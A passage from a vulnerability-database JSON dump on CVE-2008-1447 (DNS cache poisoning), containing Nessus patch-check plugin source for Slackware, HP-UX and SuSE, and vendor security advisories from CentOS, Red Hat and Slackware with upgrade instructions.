flag++;\n\nif (slackware_check(osver:\"9.0\", pkgname:\"bind\", pkgver:\"9.3.5_P1\", pkgarch:\"i386\", pkgnum:\"1_slack9.0\")) flag++;\n\nif (slackware_check(osver:\"9.1\", pkgname:\"bind\", pkgver:\"9.3.5_P1\", pkgarch:\"i486\", pkgnum:\"1_slack9.1\")) flag++;\n\nif (slackware_check(osver:\"10.0\", pkgname:\"bind\", pkgver:\"9.3.5_P1\", pkgarch:\"i486\", pkgnum:\"1_slack10.0\")) flag++;\n\nif (slackware_check(osver:\"10.1\", pkgname:\"bind\", pkgver:\"9.3.5_P1\", pkgarch:\"i486\", pkgnum:\"1_slack10.1\")) flag++;\n\nif (slackware_check(osver:\"10.2\", pkgname:\"bind\", pkgver:\"9.3.5_P1\", pkgarch:\"i486\", pkgnum:\"1_slack10.2\")) flag++;\n\nif (slackware_check(osver:\"11.0\", pkgname:\"bind\", pkgver:\"9.3.5_P1\", pkgarch:\"i486\", pkgnum:\"1_slack11.0\")) flag++;\n\nif (slackware_check(osver:\"12.0\", pkgname:\"bind\", pkgver:\"9.4.2_P1\", pkgarch:\"i486\", pkgnum:\"1_slack12.0\")) flag++;\n\nif (slackware_check(osver:\"12.1\", pkgname:\"bind\", pkgver:\"9.4.2_P1\", pkgarch:\"i486\", pkgnum:\"1_slack12.1\")) flag++;\n\nif (slackware_check(osver:\"current\", pkgname:\"bind\", pkgver:\"9.4.2_P1\", pkgarch:\"i486\", pkgnum:\"1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:slackware_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-01-12T11:32:07", "description": "s700_800 11.23 Bind 9.2.0 components : \n\nA potential security vulnerability has been identified with HP-UX\nrunning BIND. The vulnerability could be exploited remotely to cause\nDNS cache poisoning.", "edition": 25, "cvss3": {"score": 6.8, "vector": "AV:N/AC:H/PR:N/UI:N/S:C/C:N/I:H/A:N"}, "published": "2008-08-12T00:00:00", "title": "HP-UX PHNE_37865 : HP-UX Running BIND, Remote DNS Cache Poisoning (HPSBUX02351 SSRT080058 rev.6)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-1447"], "modified": "2008-08-12T00:00:00", "cpe": ["cpe:/o:hp:hp-ux"], "id": "HPUX_PHNE_37865.NASL", "href": "https://www.tenable.com/plugins/nessus/33864", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and patch checks in this plugin were \n# extracted from HP patch PHNE_37865. The text itself is\n# copyright (C) Hewlett-Packard Development Company, L.P.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(33864);\n script_version(\"1.36\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2008-1447\");\n script_bugtraq_id(30131);\n script_xref(name:\"HP\", value:\"emr_na-c01506861\");\n script_xref(name:\"HP\", value:\"HPSBUX02351\");\n script_xref(name:\"HP\", value:\"SSRT080058\");\n script_xref(name:\"IAVA\", value:\"2008-A-0045\");\n\n script_name(english:\"HP-UX PHNE_37865 : HP-UX Running BIND, Remote DNS Cache Poisoning (HPSBUX02351 SSRT080058 rev.6)\");\n script_summary(english:\"Checks for the patch in the swlist output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote HP-UX host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"s700_800 11.23 Bind 9.2.0 components : \n\nA potential security vulnerability has been identified with HP-UX\nrunning BIND. The vulnerability could be exploited remotely to cause\nDNS cache poisoning.\"\n );\n # http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01506861\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?8a80e2e7\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Install patch PHNE_37865 or subsequent.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:N/I:H/A:N\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:hp:hp-ux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2008/07/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/08/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/08/12\");\n script_set_attribute(attribute:\"patch_modification_date\", value:\"2010/12/15\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2008-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"HP-UX Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/HP-UX/version\", \"Host/HP-UX/swlist\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"hpux.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/HP-UX/version\")) audit(AUDIT_OS_NOT, \"HP-UX\");\nif (!get_kb_item(\"Host/HP-UX/swlist\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nif (!hpux_check_ctx(ctx:\"11.23\"))\n{\n exit(0, \"The host is not affected since PHNE_37865 applies to a different OS release.\");\n}\n\npatches = make_list(\"PHNE_37865\", \"PHNE_40089\", \"PHNE_40339\", \"PHNE_41721\", \"PHNE_42727\", \"PHNE_43096\", \"PHNE_43278\", \"PHNE_43369\");\nforeach patch (patches)\n{\n if (hpux_installed(app:patch))\n {\n exit(0, \"The host is not affected because patch \"+patch+\" is installed.\");\n }\n}\n\n\nflag = 0;\nif (hpux_check_patch(app:\"InternetSrvcs.INET-ENG-A-MAN\", version:\"B.11.23\")) flag++;\nif (hpux_check_patch(app:\"InternetSrvcs.INET-JPN-E-MAN\", version:\"B.11.23\")) flag++;\nif (hpux_check_patch(app:\"InternetSrvcs.INET-JPN-S-MAN\", version:\"B.11.23\")) flag++;\nif (hpux_check_patch(app:\"InternetSrvcs.INETSVCS-INETD\", version:\"B.11.23\")) flag++;\nif (hpux_check_patch(app:\"InternetSrvcs.INETSVCS-RUN\", version:\"B.11.23\")) flag++;\nif (hpux_check_patch(app:\"InternetSrvcs.INETSVCS2-RUN\", version:\"B.11.23\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:hpux_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-01-17T14:02:16", "description": "The transaction id and the udp source port used for DNS queries by the\nbind nameserver were predictable. Attackers could potentially exploit\nthat weakness to manipulate the DNS cache ('DNS cache poisoning',\nCVE-2008-1447).\n\nAdditionally the root.hint zone file was updated to contain the new IP\nnumber of the 'L' root DNS server.", "edition": 24, "published": "2009-09-24T00:00:00", "title": "SuSE9 Security Update : bind (YOU Patch Number 12197)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-1447"], "modified": "2009-09-24T00:00:00", "cpe": ["cpe:/o:suse:suse_linux"], "id": "SUSE9_12197.NASL", "href": "https://www.tenable.com/plugins/nessus/41221", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The text description of this plugin is (C) Novell, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(41221);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2008-1447\");\n script_xref(name:\"IAVA\", value:\"2008-A-0045\");\n\n script_name(english:\"SuSE9 Security Update : bind (YOU Patch Number 12197)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 9 host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The transaction id and the udp source port used for DNS queries by the\nbind nameserver were predictable. Attackers could potentially exploit\nthat weakness to manipulate the DNS cache ('DNS cache poisoning',\nCVE-2008-1447).\n\nAdditionally the root.hint zone file was updated to contain the new IP\nnumber of the 'L' root DNS server.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-1447.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply YOU patch number 12197.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:suse:suse_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/07/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/09/24\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) exit(0, \"Local checks are not enabled.\");\nif (!get_kb_item(\"Host/SuSE/release\")) exit(0, \"The host is not running SuSE.\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) exit(1, \"Could not obtain the list of installed packages.\");\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) exit(1, \"Failed to determine the architecture type.\");\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") exit(1, \"Local checks for SuSE 9 on the '\"+cpu+\"' architecture have not been implemented.\");\n\n\nflag = 0;\nif (rpm_check(release:\"SUSE9\", reference:\"bind-9.3.4-4.8\")) flag++;\nif (rpm_check(release:\"SUSE9\", reference:\"bind-devel-9.3.4-4.8\")) flag++;\nif (rpm_check(release:\"SUSE9\", reference:\"bind-utils-9.3.4-4.8\")) flag++;\nif (rpm_check(release:\"SUSE9\", cpu:\"x86_64\", reference:\"bind-utils-32bit-9-200806172350\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse exit(0, \"The host is not affected.\");\n", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:P"}}], "centos": [{"lastseen": "2019-12-20T18:28:28", "bulletinFamily": "unix", "cvelist": ["CVE-2008-1447"], "description": "**CentOS Errata and Security Advisory** CESA-2008:0533-03\n\n\nISC BIND (Berkeley Internet Name Domain) is an implementation of the DNS\r\n(Domain Name System) protocols.\r\n\r\nThe DNS protocol protects against spoofing attacks by requiring an attacker\r\nto predict both the DNS transaction ID and UDP source port of a request. In\r\nrecent years, a number of papers have found problems with DNS\r\nimplementations which make it easier for an attacker to perform DNS\r\ncache-poisoning attacks.\r\n\r\nPrevious versions of BIND did not use randomized UDP source ports. If an\r\nattacker was able to predict the random DNS transaction ID, this could make\r\nDNS cache-poisoning attacks easier. In order to provide more resilience,\r\nBIND has been updated to use a range of random UDP source ports.\r\n(CVE-2008-1447)\r\n\r\nNote: This errata also updates SELinux policy on Red Hat Enterprise Linux 4\r\nand 5 to allow BIND to use random UDP source ports.\r\n\r\nUsers of BIND are advised to upgrade to these updated packages, which\r\ncontain a backported patch to add this functionality.\r\n\r\nRed Hat would like to thank Dan Kaminsky for reporting this issue.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2008-July/027120.html\n\n**Affected packages:**\nbind\nbind-devel\nbind-utils\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/rh21as-errata.html", "edition": 3, "modified": "2008-07-09T01:20:56", "published": "2008-07-09T01:20:56", "href": "http://lists.centos.org/pipermail/centos-announce/2008-July/027120.html", "id": "CESA-2008:0533-03", "title": "bind security update", "type": "centos", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2020-12-08T03:33:58", "bulletinFamily": "unix", "cvelist": ["CVE-2008-1447"], "description": "**CentOS Errata and Security Advisory** CESA-2008:0533\n\n\nISC BIND (Berkeley Internet Name Domain) is an implementation of the DNS\r\n(Domain Name System) protocols.\r\n\r\nThe DNS protocol protects against spoofing attacks by requiring an attacker\r\nto predict both the DNS transaction ID and UDP source port of a request. In\r\nrecent years, a number of papers have found problems with DNS\r\nimplementations which make it easier for an attacker to perform DNS\r\ncache-poisoning attacks.\r\n\r\nPrevious versions of BIND did not use randomized UDP source ports. If an\r\nattacker was able to predict the random DNS transaction ID, this could make\r\nDNS cache-poisoning attacks easier. In order to provide more resilience,\r\nBIND has been updated to use a range of random UDP source ports.\r\n(CVE-2008-1447)\r\n\r\nNote: This errata also updates SELinux policy on Red Hat Enterprise Linux 4\r\nand 5 to allow BIND to use random UDP source ports.\r\n\r\nUsers of BIND are advised to upgrade to these updated packages, which\r\ncontain a backported patch to add this functionality.\r\n\r\nRed Hat would like to thank Dan Kaminsky for reporting this issue.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2008-July/027114.html\nhttp://lists.centos.org/pipermail/centos-announce/2008-July/027115.html\nhttp://lists.centos.org/pipermail/centos-announce/2008-July/027116.html\nhttp://lists.centos.org/pipermail/centos-announce/2008-July/027117.html\nhttp://lists.centos.org/pipermail/centos-announce/2008-July/027118.html\nhttp://lists.centos.org/pipermail/centos-announce/2008-July/027119.html\nhttp://lists.centos.org/pipermail/centos-announce/2008-July/027121.html\nhttp://lists.centos.org/pipermail/centos-announce/2008-July/027122.html\nhttp://lists.centos.org/pipermail/centos-announce/2008-July/027126.html\nhttp://lists.centos.org/pipermail/centos-announce/2008-July/027127.html\nhttp://lists.centos.org/pipermail/centos-announce/2008-July/027128.html\nhttp://lists.centos.org/pipermail/centos-announce/2008-July/027129.html\nhttp://lists.centos.org/pipermail/centos-announce/2008-July/039473.html\nhttp://lists.centos.org/pipermail/centos-announce/2008-July/039474.html\n\n**Affected packages:**\nbind\nbind-chroot\nbind-devel\nbind-libbind-devel\nbind-libs\nbind-sdb\nbind-utils\ncaching-nameserver\nselinux-policy\nselinux-policy-devel\nselinux-policy-mls\nselinux-policy-strict\nselinux-policy-targeted\nselinux-policy-targeted-sources\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2008-0533.html", "edition": 4, "modified": "2008-07-12T12:47:34", "published": "2008-07-08T22:25:27", "href": "http://lists.centos.org/pipermail/centos-announce/2008-July/027115.html", "id": "CESA-2008:0533", "title": "bind, caching, selinux security update", "type": "centos", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}], "redhat": [{"lastseen": "2019-08-13T18:46:43", "bulletinFamily": "unix", "cvelist": ["CVE-2008-1447"], "description": "Dnsmasq is lightweight DNS forwarder and DHCP server. It is designed to\nprovide DNS and, optionally, DHCP, to a small network.\n\nThe dnsmasq DNS resolver used a fixed source UDP port. This could have made\nDNS spoofing attacks easier. dnsmasq has been updated to use random UDP\nsource ports, helping to make DNS spoofing attacks harder. (CVE-2008-1447)\n\nAll dnsmasq users are advised to upgrade to this updated package, that\nupgrades dnsmasq to version 2.45, which resolves this issue.", "modified": "2017-09-08T12:13:40", "published": "2008-08-11T04:00:00", "id": "RHSA-2008:0789", "href": "https://access.redhat.com/errata/RHSA-2008:0789", "type": "redhat", "title": "(RHSA-2008:0789) Moderate: dnsmasq security update", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2019-08-13T18:45:25", "bulletinFamily": "unix", "cvelist": ["CVE-2008-1447"], "description": "ISC BIND (Berkeley Internet Name Domain) is an implementation of the DNS\r\n(Domain Name System) protocols.\r\n\r\nThe DNS protocol protects against spoofing attacks by requiring an attacker\r\nto predict both the DNS transaction ID and UDP source port of a request. In\r\nrecent years, a number of papers have found problems with DNS\r\nimplementations which make it easier for an attacker to perform DNS\r\ncache-poisoning attacks.\r\n\r\nPrevious versions of BIND did not use randomized UDP source ports. If an\r\nattacker was able to predict the random DNS transaction ID, this could make\r\nDNS cache-poisoning attacks easier. In order to provide more resilience,\r\nBIND has been updated to use a range of random UDP source ports.\r\n(CVE-2008-1447)\r\n\r\nNote: This errata also updates SELinux policy on Red Hat Enterprise Linux 4\r\nand 5 to allow BIND to use random UDP source ports.\r\n\r\nUsers of BIND are advised to upgrade to these updated packages, which\r\ncontain a backported patch to add this functionality.\r\n\r\nRed Hat would like to thank Dan Kaminsky for reporting this issue.", "modified": "2019-03-22T23:42:40", "published": "2008-07-08T04:00:00", "id": "RHSA-2008:0533", "href": "https://access.redhat.com/errata/RHSA-2008:0533", "type": "redhat", "title": "(RHSA-2008:0533) Important: bind security update", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}], "slackware": [{"lastseen": "2020-10-25T16:36:02", "bulletinFamily": "unix", "cvelist": ["CVE-2008-1447"], "description": "New dnsmasq packages are available for Slackware 10.0, 10.1, 10.2, 11.0,\n12.0, 12.1, and -current to address possible DNS cache poisoning issues.\n\nMore details about this issue may be found in the Common\nVulnerabilities and Exposures (CVE) database:\n\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1447\n\n\nHere are the details from the Slackware 12.1 ChangeLog:\n\npatches/packages/dnsmasq-2.45-i486-1_slack12.1.tgz:\n Upgraded to dnsmasq-2.45.\n It was discovered that earlier versions of dnsmasq have DNS cache\n weaknesses that are similar to the ones recently discovered in BIND.\n This new release minimizes the risk of cache poisoning.\n For more information, see:\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1447\n (* Security fix *)\n\nWhere to find the new packages:\n\nHINT: Getting slow download speeds from ftp.slackware.com?\nGive slackware.osuosl.org a try. This is another primary FTP site\nfor Slackware that can be considerably faster than downloading\ndirectly from ftp.slackware.com.\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating additional FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the \"Get Slack\" section on http://slackware.com for\nadditional mirror sites near you.\n\nUpdated package for Slackware 10.0:\nftp://ftp.slackware.com/pub/slackware/slackware-10.0/patches/packages/dnsmasq-2.45-i486-1_slack10.0.tgz\n\nUpdated package for Slackware 10.1:\nftp://ftp.slackware.com/pub/slackware/slackware-10.1/patches/packages/dnsmasq-2.45-i486-1_slack10.1.tgz\n\nUpdated package for Slackware 10.2:\nftp://ftp.slackware.com/pub/slackware/slackware-10.2/patches/packages/dnsmasq-2.45-i486-1_slack10.2.tgz\n\nUpdated package for Slackware 11.0:\nftp://ftp.slackware.com/pub/slackware/slackware-11.0/patches/packages/dnsmasq-2.45-i486-1_slack11.0.tgz\n\nUpdated package for Slackware 12.0:\nftp://ftp.slackware.com/pub/slackware/slackware-12.0/patches/packages/dnsmasq-2.45-i486-1_slack12.0.tgz\n\nUpdated package for Slackware 12.1:\nftp://ftp.slackware.com/pub/slackware/slackware-12.1/patches/packages/dnsmasq-2.45-i486-1_slack12.1.tgz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/dnsmasq-2.45-i486-1.tgz\n\n\nMD5 signatures:\n\nSlackware 10.0 package:\ne1f567c3679e23ab3f80a86cec1343c4 dnsmasq-2.45-i486-1_slack10.0.tgz\n\nSlackware 10.1 package:\naabb7b9b872654b9b663014d49ba37c1 dnsmasq-2.45-i486-1_slack10.1.tgz\n\nSlackware 10.2 package:\n41c8042baabfdbdeb7b59f2fd48cbc08 dnsmasq-2.45-i486-1_slack10.2.tgz\n\nSlackware 11.0 package:\nfab50ae940bde92eabba0c062908ef42 dnsmasq-2.45-i486-1_slack11.0.tgz\n\nSlackware 12.0 package:\nb8e850a726270c0d7e305a7c6523ede4 dnsmasq-2.45-i486-1_slack12.0.tgz\n\nSlackware 12.1 package:\n1c61011340f57e4179c788f3f0127dc0 dnsmasq-2.45-i486-1_slack12.1.tgz\n\nSlackware -current package:\n11fe1505a7177ec1a1c84a1b259b9c03 dnsmasq-2.45-i486-1.tgz\n\n\nInstallation instructions:\n\nUpgrade the packages as root:\n > upgradepkg dnsmasq-2.45-i486-1_slack12.1.tgz\n\nRestart dnsmasq:\n > sh /etc/rc.d/rc.dnsmasq restart", "modified": "2008-07-24T00:02:47", "published": "2008-07-24T00:02:47", "id": "SSA-2008-205-01", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2008&m=slackware-security.452680", "type": "slackware", "title": "[slackware-security] dnsmasq", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2020-10-25T16:36:05", "bulletinFamily": "unix", "cvelist": ["CVE-2008-1447"], "description": "New bind packages are available for Slackware 8.1, 9.0, 9.1, 10.0, 10.1, 10.2,\n11.0, 12.0, 12.1, and -current to address a security problem.\n\nMore details may be found at the following links:\n\n http://www.isc.org/sw/bind/bind-security.php\n http://www.kb.cert.org/vuls/id/800113\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1447\n\n\nHere are the details from the Slackware 12.1 ChangeLog:\n\npatches/packages/bind-9.4.2_P1-i486-1_slack12.1.tgz:\n Upgraded to bind-9.4.2-P1.\n This upgrade addresses a security flaw known as the CERT VU#800113 DNS Cache\n Poisoning Issue. This is the summary of the problem from the BIND site:\n \"A weakness in the DNS protocol may enable the poisoning of caching\n recurive resolvers with spoofed data. DNSSEC is the only full solution.\n New versions of BIND provide increased resilience to the attack.\"\n It is suggested that sites that run BIND upgrade to one of the new packages\n in order to reduce their exposure to DNS cache poisoning attacks.\n For more information, see:\n http://www.isc.org/sw/bind/bind-security.php\n http://www.kb.cert.org/vuls/id/800113\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1447\n (* Security fix *)\n\nWhere to find the new packages:\n\nHINT: Getting slow download speeds from ftp.slackware.com?\nGive slackware.osuosl.org a try. This is another primary FTP site\nfor Slackware that can be considerably faster than downloading\ndirectly from ftp.slackware.com.\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating additional FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the \"Get Slack\" section on http://slackware.com for\nadditional mirror sites near you.\n\nUpdated package for Slackware 8.1:\nftp://ftp.slackware.com/pub/slackware/slackware-8.1/patches/packages/bind-9.3.5_P1-i386-1_slack8.1.tgz\n\nUpdated package for Slackware 9.0:\nftp://ftp.slackware.com/pub/slackware/slackware-9.0/patches/packages/bind-9.3.5_P1-i386-1_slack9.0.tgz\n\nUpdated package for Slackware 9.1:\nftp://ftp.slackware.com/pub/slackware/slackware-9.1/patches/packages/bind-9.3.5_P1-i486-1_slack9.1.tgz\n\nUpdated package for Slackware 10.0:\nftp://ftp.slackware.com/pub/slackware/slackware-10.0/patches/packages/bind-9.3.5_P1-i486-1_slack10.0.tgz\n\nUpdated package for Slackware 10.1:\nftp://ftp.slackware.com/pub/slackware/slackware-10.1/patches/packages/bind-9.3.5_P1-i486-1_slack10.1.tgz\n\nUpdated package for Slackware 10.2:\nftp://ftp.slackware.com/pub/slackware/slackware-10.2/patches/packages/bind-9.3.5_P1-i486-1_slack10.2.tgz\n\nUpdated package for Slackware 11.0:\nftp://ftp.slackware.com/pub/slackware/slackware-11.0/patches/packages/bind-9.3.5_P1-i486-1_slack11.0.tgz\n\nUpdated package for Slackware 12.0:\nftp://ftp.slackware.com/pub/slackware/slackware-12.0/patches/packages/bind-9.4.2_P1-i486-1_slack12.0.tgz\n\nUpdated package for Slackware 12.1:\nftp://ftp.slackware.com/pub/slackware/slackware-12.1/patches/packages/bind-9.4.2_P1-i486-1_slack12.1.tgz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/bind-9.4.2_P1-i486-1.tgz\n\n\nMD5 signatures:\n\nSlackware 8.1 package:\nc693e1ae4997c7cc23c0051ec1c90796 bind-9.3.5_P1-i386-1_slack8.1.tgz\n\nSlackware 9.0 package:\n24326f563c6588a0541f3409bc7298cd bind-9.3.5_P1-i386-1_slack9.0.tgz\n\nSlackware 9.1 package:\n67178dd97006cf4cf3543704c82741b8 bind-9.3.5_P1-i486-1_slack9.1.tgz\n\nSlackware 10.0 package:\na12c9e8304c5a7e285fa4df7d4b9756b bind-9.3.5_P1-i486-1_slack10.0.tgz\n\nSlackware 10.1 package:\n6209e4a5f9693451279b0d02795b9bd8 bind-9.3.5_P1-i486-1_slack10.1.tgz\n\nSlackware 10.2 package:\ne1c6d74c787fa3b7f3a5905fef206206 bind-9.3.5_P1-i486-1_slack10.2.tgz\n\nSlackware 11.0 package:\nd354a0118388bb0f3fd32fa79166746a bind-9.3.5_P1-i486-1_slack11.0.tgz\n\nSlackware 12.0 package:\n5b1087e6a0dc79ebf06144f44d5bb52f bind-9.4.2_P1-i486-1_slack12.0.tgz\n\nSlackware 12.1 package:\nda76550505d62f0d902b710a078d1020 bind-9.4.2_P1-i486-1_slack12.1.tgz\n\nSlackware -current package:\nc255530e46f4cff8080a20b6c8d12443 bind-9.4.2_P1-i486-1.tgz\n\n\nInstallation instructions:\n\nUpgrade the package as root:\n > upgradepkg bind-9.4.2_P1-i486-1_slack12.1.tgz\n\nThen, restart the nameserver:\n > /etc/rc.d/rc.bind restart", "modified": "2008-07-10T04:29:01", "published": "2008-07-10T04:29:01", "id": "SSA-2008-191-02", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2008&m=slackware-security.539239", "type": "slackware", "title": "[slackware-security] bind", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2020-10-25T16:35:52", "bulletinFamily": "unix", "cvelist": ["CVE-2008-1447"], "description": "New ruby packages are available for Slackware 11.0, 12.0, and 12.1 to\nfix bugs and a security issue.\n\nMore details about the issue may be found in the Common\nVulnerabilities and Exposures (CVE) database:\n\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1447\n\n\nHere are the details from the Slackware 12.1 ChangeLog:\n\npatches/packages/ruby-1.8.6_p287-i486-1_slack12.1.tgz:\n Upgraded to ruby-1.8.6-p287.\n This fixes several bugs in the previous Ruby update, including a security\n issue where the DNS resolver did not randomize the source port and\n transaction id sufficiently.\n For more information, see:\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1447\n (* Security fix *)\n\nWhere to find the new packages:\n\nHINT: Getting slow download speeds from ftp.slackware.com?\nGive slackware.osuosl.org a try. This is another primary FTP site\nfor Slackware that can be considerably faster than downloading\ndirectly from ftp.slackware.com.\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating additional FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the \"Get Slack\" section on http://slackware.com for\nadditional mirror sites near you.\n\nUpdated package for Slackware 11.0:\nftp://ftp.slackware.com/pub/slackware/slackware-11.0/patches/packages/ruby-1.8.6_p287-i486-1_slack11.0.tgz\n\nUpdated package for Slackware 12.0:\nftp://ftp.slackware.com/pub/slackware/slackware-12.0/patches/packages/ruby-1.8.6_p287-i486-1_slack12.0.tgz\n\nUpdated package for Slackware 12.1:\nftp://ftp.slackware.com/pub/slackware/slackware-12.1/patches/packages/ruby-1.8.6_p287-i486-1_slack12.1.tgz\n\n\nMD5 signatures:\n\nSlackware 11.0 package:\n68f319999719565f3f05acf61e791f92 ruby-1.8.6_p287-i486-1_slack11.0.tgz\n\nSlackware 12.0 package:\n967059ae6d9a3a3ea609472e4f3c3903 ruby-1.8.6_p287-i486-1_slack12.0.tgz\n\nSlackware 12.1 package:\nbc821c4e4eee3608e1c5e2e30238b450 ruby-1.8.6_p287-i486-1_slack12.1.tgz\n\n\nInstallation instructions:\n\nUpgrade the package as root:\n > upgradepkg ruby-1.8.6_p287-i486-1_slack12.1.tgz", "modified": "2008-11-29T21:37:03", "published": "2008-11-29T21:37:03", "id": "SSA-2008-334-01", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2008&m=slackware-security.371754", "type": "slackware", "title": "[slackware-security] ruby", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}], "debian": [{"lastseen": "2019-05-30T02:21:36", "bulletinFamily": "unix", "cvelist": ["CVE-2008-1447"], "description": "- ------------------------------------------------------------------------\nDebian Security Advisory DSA-1605-1 security@debian.org\nhttp://www.debian.org/security/ Florian Weimer\nJuly 08, 2008 